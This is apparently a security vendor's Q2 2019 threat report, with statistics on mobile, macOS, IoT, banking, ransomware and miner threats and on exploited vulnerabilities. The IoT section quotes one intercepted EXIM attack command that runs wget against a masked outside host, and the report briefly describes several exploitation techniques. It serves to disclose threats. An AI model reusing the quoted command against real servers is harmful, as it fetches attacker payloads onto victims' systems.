Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 44.37 2 Trojan.AndroidOS.Boogr.gsh 11.31 3 DangerousObject.AndroidOS.GenericML 5.66 4 Trojan.AndroidOS.Hiddapp.cr 4.77 5 Trojan.AndroidOS.Hiddapp.ch 4.17 6 Trojan.AndroidOS.Hiddapp.cf 2.81 7 Trojan.AndroidOS.Hiddad.em 2.53 8 Trojan-Dropper.AndroidOS.Lezok.p 2.16 9 Trojan-Dropper.AndroidOS.Hqwar.bb 2.08 10 Trojan-Banker.AndroidOS.Asacub.a 1.93 11 Trojan-Banker.AndroidOS.Asacub.snt 1.92 12 Trojan-Banker.AndroidOS.Svpeng.ak 1.91 13 Trojan.AndroidOS.Hiddapp.cg 1.89 14 Trojan.AndroidOS.Dvmap.a 1.88 15 Trojan-Dropper.AndroidOS.Hqwar.gen 1.86 16 Trojan.AndroidOS.Agent.rt 1.81 17 Trojan-SMS.AndroidOS.Prizmes.a 1.58 18 Trojan.AndroidOS.Fakeapp.bt 1.58 19 Trojan.AndroidOS.Agent.eb 1.49 20 Exploit.AndroidOS.Lotoor.be 1.46

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked.

As per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Fourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.

Eighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.

Ninth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.

Tenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.

Geography of mobile threats

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile malware infection attempts, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile malware Country* %** 1 Iran 28.31 2 Bangladesh 28.10 3 Algeria 24.77 4 Pakistan 24.00 5 Tanzania 23.07 6 Nigeria 22.69 7 India 21.65 8 Indonesia 18.13 9 Sri Lanka 15.96 10 Kenya 15.38

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country.

At the head of Q2’s Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.

Most often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).

Like Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).

Third place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.

Mobile banking Trojans

In the reporting period, we detected 13,899 installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.

The largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q2 2019 (download)

Top 10 mobile banking Trojans

Verdict %* 1 Trojan-Banker.AndroidOS.Asacub.a 13.64 2 Trojan-Banker.AndroidOS.Asacub.snt 13.61 3 Trojan-Banker.AndroidOS.Svpeng.ak 13.51 4 Trojan-Banker.AndroidOS.Svpeng.q 9.90 5 Trojan-Banker.AndroidOS.Agent.ep 9.37 6 Trojan-Banker.AndroidOS.Asacub.ce 7.75 7 Trojan-Banker.AndroidOS.Faketoken.q 4.18 8 Trojan-Banker.AndroidOS.Asacub.cs 4.18 9 Trojan-Banker.AndroidOS.Agent.eq 3.81 10 Trojan-Banker.AndroidOS.Faketoken.z 3.13

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats.

Almost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family’s distribution bursts that we registered last quarter were not repeated this time.

As in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile banking threats, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans: Country* %** 1 South Africa 0.64% 2 Russia 0.31% 3 Tajikistan 0.21% 4 Australia 0.17% 5 Turkey 0.17% 6 Ukraine 0.13% 7 Uzbekistan 0.11% 8 Korea 0.11% 9 Armenia 0.10% 10 India 0.10%

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

In Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.

Second place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).

Third place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.

Mobile ransomware Trojans

In Q2 2019, we detected 23,294 installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans, Q3 2018 – Q2 2019 (download)

Top 10 mobile ransomware Trojans Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.aj 43.90 2 Trojan-Ransom.AndroidOS.Rkor.i 11.26 3 Trojan-Ransom.AndroidOS.Rkor.h 7.81 4 Trojan-Ransom.AndroidOS.Small.as 6.41 5 Trojan-Ransom.AndroidOS.Svpeng.ah 5.92 6 Trojan-Ransom.AndroidOS.Svpeng.ai 3.35 7 Trojan-Ransom.AndroidOS.Fusob.h 2.48 8 Trojan-Ransom.AndroidOS.Small.o 2.46 9 Trojan-Ransom.AndroidOS.Pigetrl.a 2.45 10 Trojan-Ransom.AndroidOS.Small.ce 2.22

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.

In Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware Trojans, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans: Country* %** 1 US 1.58 2 Kazakhstan 0.39 3 Iran 0.27 4 Pakistan 0.16 5 Saudi Arabia 0.10 6 Mexico 0.09 7 Canada 0.07 8 Italy 0.07 9 Singapore 0.05 10 Indonesia 0.05

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)
** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

The leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)

Attacks on Apple macOS

Q2 witnessed several interesting events, three of which deserve special attention.

A vulnerability was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.

Vulnerabilities detected in the Firefox browser (CVE-2019-11707, CVE-2019-11708) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.

Also an interesting vector for delivering a malicious miner to victims was discovered. The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish – both QEMU and the miner consume significant resources – that such a Trojan could not remain unnoticed for long.

Top 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 24.61 2 AdWare.OSX.Spc.a 12.75 3 AdWare.OSX.Bnodlero.t 11.98 4 AdWare.OSX.Pirrit.j 11.27 5 AdWare.OSX.Pirrit.p 8.42 6 AdWare.OSX.Pirrit.s 7.76 7 AdWare.OSX.Pirrit.o 7.59 8 AdWare.OSX.MacSearch.a 5.92 9 AdWare.OSX.Cimpli.d 5.76 10 AdWare.OSX.Mcp.a 5.39 11 AdWare.OSX.Agent.b 5.11 12 AdWare.OSX.Pirrit.q 4.31 13 AdWare.OSX.Bnodlero.v 4.02 14 AdWare.OSX.Bnodlero.q 3.70 15 AdWare.OSX.MacSearch.d 3.66 16 Downloader.OSX.InstallCore.ab 3.58 17 AdWare.OSX.Geonei.as 3.48 18 AdWare.OSX.Amc.a 3.29 19 AdWare.OSX.Agent.c 2.93 20 AdWare.OSX.Mhp.a 2.90

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

On the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.

Threat geography Country* %** 1 France 11.11 2 Spain 9.68 3 India 8.84 4 US 8.49 5 Canada 8.35 6 Russia 8.01 7 Italy 7.74 8 UK 7.47 9 Mexico 7.08 10 Brazil 6.85

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.

In the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.

IoT attacks Interesting events

In the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new vulnerability in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.

Intercepted attack traffic

The screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows:

/bin/bash -c "wget X.X.X.X/exm -O /dev/null IoT threat statistics

Q2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH.

SSH 40.43% Telnet 59.57%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019

However, in terms of number of sessions involving Kaspersky Lab honeypots, we see a decline for SSH from 64% in Q1 to 49.6% in Q2.

SSH 49.59% Telnet 50.41%

Distribution of cybercriminals’ working sessions with Kaspersky Lab traps, Q2 2019

Telnet-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019 (download)

Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps Country % 1 Egypt 15.06 2 China 12.27 3 Brazil 10.24 4 US 5.23 5 Russia 5.03 6 Greece 4.54 7 Iran 4.06 8 Taiwan 3.15 9 India 3.04 10 Turkey 2.90

For the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.

Telnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.

Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks Verdict %* 1 Backdoor.Linux.Mirai.b 38.92 2 Trojan-Downloader.Linux.NyaDrop.b 26.48 3 Backdoor.Linux.Mirai.ba 26.48 4 Backdoor.Linux.Mirai.au 15.75 5 Backdoor.Linux.Gafgyt.bj 2.70 6 Backdoor.Linux.Mirai.ad 2.57 7 Backdoor.Linux.Gafgyt.az 2.45 8 Backdoor.Linux.Mirai.h 1.38 9 Backdoor.Linux.Mirai.c 1.36 10 Backdoor.Linux.Gafgyt.av 1.26

* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks

As things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.

SSH-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019 (download)

Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps Country % 1 Vietnam 15.85 2 China 14.51 3 Egypt 12.17 4 Brazil 6.91 5 Russia 6.66 6 US 5.05 7 Thailand 3.76 8 Azerbaijan 3.62 9 India 2.43 10 France 2.12

In Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.

Financial threats Financial threat statistics

In Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by financial malware, Q2 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of banking malware attacks, Q2 2019 (download)

Top 10 countries by share of attacked users Country* %** 1 Belarus 2.0 2 Venezuela 1.8 3 China 1.6 4 Indonesia 1.3 5 South Korea 1.3 6 Cyprus 1.2 7 Paraguay 1.2 8 Russia 1.2 9 Cameroon 1.1 10 Serbia 1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families Name Verdicts %* 1 RTM Trojan-Banker.Win32.RTM 32.2 2 Zbot Trojan.Win32.Zbot 23.3 3 Emotet Backdoor.Win32.Emotet 8.2 4 Nimnul Virus.Win32.Nimnul 6.4 5 Trickster Trojan.Win32.Trickster 5.0 6 Nymaim Trojan.Win32.Nymaim 3.5 7 SpyEye Backdoor.Win32.SpyEye 3.2 8 Neurevt Trojan.Win32.Neurevt 2.8 9 IcedID Trojan-Banker.Win32.IcedID 1.2 10 Gozi Trojan.Win32.Gozi 1.1

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.

We also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.

Ransomware programs Quarterly highlights

After almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was shutting down the operation. According to our reports, it was one of the most common ransomware encryptors.

In Q2, distribution got underway of the new Sodin ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.

Also this quarter, there were a few high-profile ransomware infections in the computer networks of city administrations. This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.

Number of new modifications

In Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new ransomware modifications, Q2 2018 – Q2 2019 (download)

The majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware – it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim’s data inside them in encrypted form.

Number of users attacked by ransomware Trojans

In Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by ransomware Trojans, Q2 2019 (download)

The busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019 (download)

Top 10 countries attacked by ransomware Trojans Country* % of users attacked by ransomware** 1 Bangladesh 8.81% 2 Uzbekistan 5.52% 3 Mozambique 4.15% 4 Ethiopia 2.42% 5 Nepal 2.26% 6 Afghanistan 1.50% 7 China 1.18% 8 Ghana 1.17% 9 Korea 1.07% 10 Kazakhstan 1.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans Name Verdict* Percentage of attacked users** 1 WannaCry Trojan-Ransom.Win32.Wanna 23.37% 2 (generic verdict) Trojan-Ransom.Win32.Phny 18.73% 3 GandCrab Trojan-Ransom.Win32.GandCrypt 13.83% 4 (generic verdict) Trojan-Ransom.Win32.Gen 7.41% 5 (generic verdict) Trojan-Ransom.Win32.Crypmod 4.73% 6 (generic verdict) Trojan-Ransom.Win32.Encoder 4.15% 7 Shade Trojan-Ransom.Win32.Shade 2.75% 8 PolyRansom/VirLock Virus.Win32.PolyRansom
Trojan-Ransom.Win32.PolyRansom 2.45% 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 1.31% 10 Cryakl Trojan-Ransom.Win32.Cryakl 1.24%

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data.
** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners Number of new modifications

In Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new miner modifications, Q2 2019 (download)

The largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q2 2019 (download)

Throughout the quarter, the number of attacked users gradually decreased – from 383,000 in April to 318,000 in June.

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical spread of countries by share of users attacked by miners, Q2 2019 (download)

Top 10 countries by share of users attacked by miners

Country* % of users attacked by miners** 1 Afghanistan 10.77% 2 Ethiopia 8.99% 3 Uzbekistan 6.83% 4 Kazakhstan 4.76% 5 Tanzania 4.66% 6 Vietnam 4.28% 7 Mozambique 3.97% 8 Ukraine 3.08% 9 Belarus 3.06% 10 Mongolia 3.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyber attacks

Over the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception – the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802 vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as CVE-2017-8570 and CVE-2017-8759 are also popular with cybercriminals.

The increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019 (download)

The share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of Coinbase and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, CVE-2019-11707 and CVE-2019-11708, for remote code execution in Mozilla Firefox.

On the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: CVE-2019-1069, CVE-2019-0863, CVE-2019-0841, and CVE-2019-0973.

The share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as Oracle WebLogic. A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the CVE-2019-0708 vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the WannaCry ransomware. Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: Top 10

